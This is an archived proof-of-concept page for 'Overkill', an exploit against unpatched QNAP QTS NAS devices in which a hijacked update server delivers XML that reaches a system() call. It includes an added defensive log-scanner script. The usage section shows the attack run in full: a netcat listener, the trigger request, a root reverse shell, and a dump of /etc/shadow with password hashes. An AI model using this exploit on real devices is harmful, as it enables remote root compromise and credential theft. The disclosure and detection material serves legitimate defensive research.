
CVE-2020-2509 PoC: Qnap Systems QNAP QTS and QNAP Systems QUTS Hero command injection vulnerability

Source
Related vulnerability
Title: Qnap Systems QNAP QTS and QNAP Systems QUTS Hero command injection vulnerability (CVE-2020-2509)
Description: Qnap Systems QNAP QTS is a data storage appliance with a SAN-like storage architecture from Qnap Systems (China). The device supports tiered storage, mirroring protection and similar safeguards. QNAP Systems QUTS Hero is a NAS operating system for file management from QNAP Systems (China). It keeps the QTS application ecosystem and integrates the more powerful 128-bit ZFS file system, giving enterprises a more stable and reliable NAS storage solution. QTS and QuTS hero contain a command injection vulnerability, which stems from an attacker being able to execute arbitrary commands in a compromised application.
Description
QNAP N-Day (Probably not CVE-2020-2509)
Introduction
# Overkill

Overkill is an exploit for a patched vulnerability affecting QNAP QTS. Due to the way QNAP discloses vulnerabilities, I'm unsure if this issue has a CVE or not. However, it was likely patched in November 2020 and April 2021. The n-day was "discovered" while doing diff analysis for CVE-2020-2509. This is almost certainly not CVE-2020-2509. 

The exploit will send HTTP GET requests to `/cgi-bin/qnapmsg.cgi?lang=xxx`, which will cause unpatched QNAP devices to download an XML file from `update.qnap.com` via insecure HTTP. An attacker that can redirect `update.qnap.com` to themselves can respond with an attacker-controlled XML file. When the QNAP device parses the XML file, it passes some of the contents to a `system` call, resulting in a reverse shell.

This exploit *does not* implement the method to get `update.qnap.com` requests directed to the exploit. In the example below, I was using router DNS hijacking on my own router... your mileage may vary.
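For defenders, the two observable steps of the sequence described above are the inbound request to `/cgi-bin/qnapmsg.cgi?lang=...` and the NAS's follow-up plaintext HTTP fetch of `/loginad//qnapmsg_<lang>.xml` (the path visible in the PoC's server output). The following scanner is an added example, not part of the Overkill project; it parses constructed access-log lines in combined log format and in Python `http.server` format and flags both steps. The endpoint is a legitimate QTS CGI, so a "trigger" finding on its own only warrants review; the correlated plaintext fetch, on a device not yet patched to the November 2020 / April 2021 level, is the condition worth alerting on. Log lines, the `/cgi-bin/other.cgi` path and the IP addresses in the sample are constructed.

```python
import re
from typing import Iterator, List, NamedTuple, Optional
from urllib.parse import parse_qs, urlsplit

# Matches combined-log-format lines and Python http.server lines alike:
# client, two ignored fields, [timestamp], "METHOD target ...", status.
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The CGI the PoC requests; the `lang` value selects which qnapmsg_<lang>.xml the NAS fetches.
TRIGGER_PATH = "/cgi-bin/qnapmsg.cgi"
# Shape of the XML path the NAS then requests from update.qnap.com (the PoC output shows
# a doubled slash, so accept one or more).
FETCH_RE = re.compile(r"^/loginad/+qnapmsg_(?P<lang>[A-Za-z_]+)\.xml$")


class Finding(NamedTuple):
    kind: str      # "trigger": request to the CGI; "fetch": the plaintext XML download
    client: str
    ts: str
    detail: str


def scan_line(line: str) -> Optional[Finding]:
    """Classify one access-log line; returns None for lines of no interest."""
    m = CLF_RE.match(line)
    if not m:
        return None
    # urlsplit handles both origin-form ("/path?q") and absolute-form
    # ("http://host/path") request targets, the latter typical of proxy logs.
    parts = urlsplit(m["target"])
    if parts.path == TRIGGER_PATH:
        lang = parse_qs(parts.query).get("lang", ["<none>"])[0]
        return Finding("trigger", m["client"], m["ts"], f"lang={lang}")
    fm = FETCH_RE.match(parts.path)
    # Only the plaintext fetch is flagged: an HTTPS download is not the
    # hijackable transport the PoC relies on.
    if fm and parts.scheme in ("", "http"):
        host = parts.netloc or "<relative>"
        return Finding("fetch", m["client"], m["ts"], f"host={host} lang={fm['lang']}")
    return None


def scan_logs(lines) -> List[Finding]:
    """Run scan_line over an iterable of log lines and keep the hits in order."""
    return [f for f in (scan_line(line) for line in lines) if f is not None]


# Constructed sample: one trigger from a LAN host, the NAS fetching the XML as seen
# from the attacker-side server (http.server format) and from an egress proxy (CLF),
# an unrelated CGI request, and an HTTPS fetch that must not be flagged.
SAMPLE_LOG = """\
10.12.70.252 - - [27/Jul/2022:11:58:20 +0000] "GET /cgi-bin/qnapmsg.cgi?lang=eng HTTP/1.1" 200 512
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
10.12.70.251 - - [27/Jul/2022:11:58:23 +0000] "GET http://update.qnap.com/loginad//qnapmsg_eng.xml HTTP/1.1" 200 2048
10.12.70.252 - - [27/Jul/2022:11:58:30 +0000] "GET /cgi-bin/other.cgi HTTP/1.1" 200 300
10.12.70.251 - - [27/Jul/2022:11:59:00 +0000] "GET https://update.qnap.com/loginad/qnapmsg_eng.xml HTTP/1.1" 200 2048
"""


def scan_sample() -> List[Finding]:
    return scan_logs(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in scan_sample():
        print(f"[{f.kind:7}] {f.ts} {f.client} {f.detail}")
```

Running the block prints one `trigger` line and two `fetch` lines; the unrelated CGI request and the HTTPS download are ignored. In practice the scanner would be fed the NAS web-server log for the trigger and an egress proxy or packet-capture-derived log for the fetch, and a fetch whose `host` does not resolve to QNAP's update infrastructure is the strongest indicator that the redirection step the README leaves to the attacker has taken place.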

## Usage Example

```
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252

01001001001000000110001101100001011011100010011101110100001000000110011101100101
    ______  ___      ___  _______   _______   __   ___   __    ___      ___ 
   /    " \|"  \    /"  |/"     "| /"      \ |/"| /  ") |" \  |"  |    |"  |
  // ____  \\   \  //  /(: ______)|:        |(: |/   /  ||  | ||  |    ||  |
 /  /    ) :)\\  \/. ./  \/    |  |_____/   )|    __/   |:  | |:  |    |:  |
(: (____/ //  \.    //   // ___)_  //      / (// _  \   |.  |  \  |___  \  |___
 \        /    \\   /   (:      "||:  __   \ |: | \  \  /\  |\( \_|:  \( \_|:  \
  \"_____/      \__/     \_______)|__|  \___)(__|  \__)(__\_|_)\_______)\_______)

01110100001000000111010001101111001000000111001101101100011001010110010101110000

                                🦞 jbaines-r7

[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:!:19181:0:99999:7:::
bash-3.2# exit  
```

## Credit

* [Overkill](https://www.youtube.com/watch?v=vB_IynOTQU0) by Lazlo Bane featuring Colin Hay

File snapshot

```
[4.0K] /data/pocs/fc70c1e3a2e947bf13e9d8c2cb8134af2e2495a3
├── [1.5K] LICENSE
├── [4.8K] overkill.py
└── [2.8K] README.md

0 directories, 3 files
```
Cached for you by the Shenlong bot.
Notes
    1. Accessing the original source is recommended.
    2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for or donating to the local PoC archive. Thank you for your support.